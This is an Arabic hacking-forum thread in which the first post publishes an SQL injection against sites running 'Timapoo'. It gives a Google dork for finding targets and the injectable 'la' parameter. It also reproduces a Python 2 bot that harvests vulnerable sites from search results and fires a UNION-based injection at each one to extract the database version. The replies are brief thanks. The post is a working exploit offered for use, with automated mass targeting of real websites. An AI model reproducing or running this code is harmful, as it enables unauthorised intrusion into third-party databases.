الوسوم:
حالة الموضوع:
مغلق
  1. Fox

    Fox Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    81
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    ŖĬỹДďҢ
    بسم الله الرحمن الرحيم

    السلام عليكم اخواني

    الثغرا من اكتشاف SoUiLaHxXx_Dz

    كود PHP:
    ####################################################################################
    # Title : Powered by Timapoo [sql injection]
    # Author : SoUiLaHxXx_Dz
    # Date : 06-20-2013
    ####################################################################################

    Dork :
     
    inurl:"dynamic.php?sys=faq" Powered by Timapoo

    exploit 
    :
     
    http://site/dynamic.php?sys=faq&action=new&la=[SQL]
    الاخ UzunDz نشر بوت واستغلال لها..

    كود PHP:
    #!C:\Python27\python.exe 
    '''  
        by Ali , UzunDz 
        UzunDz[at]gmail[dot]com 
        Sec4ever.com , dz-root.com 
        x00x-Team. 
        Vuln : Timapoo SQLi 
    ''' 
    from google import search 
    import urllib2
    ,re 

    def exploit_url
    (url): 
        try : 
            
    exp "dynamic.php?sys=faq&la=' div 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x555a55,version(),0x4e445a),14,15,16%23" 
            
    target re.sub('dynamic.php(.*)','',url
            print 
    "Trying to inject : "+target 
            run 
    urllib2.urlopen(target+exp.replace(' ','%20')).read() 
            print 
    "Version : "+re.findall('UZU(.*)NDZ',run)[0
        
    except 
            
    pass 

    dork 
    'inurl:"dynamic.php?sys=faq" Powered by Timapoo' 
    for url in search(dork,stop=(100)): 
        if 
    'dynamic.php' in url
            
    exploit_url(url)

     
  2. Mstr Yaser

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    1
    رد: Powered by Timapoo sql injection

    يعطيك العافية ~
     
  3. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: Powered by Timapoo sql injection

    شكراً جزيلاً
    {1!$8}
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة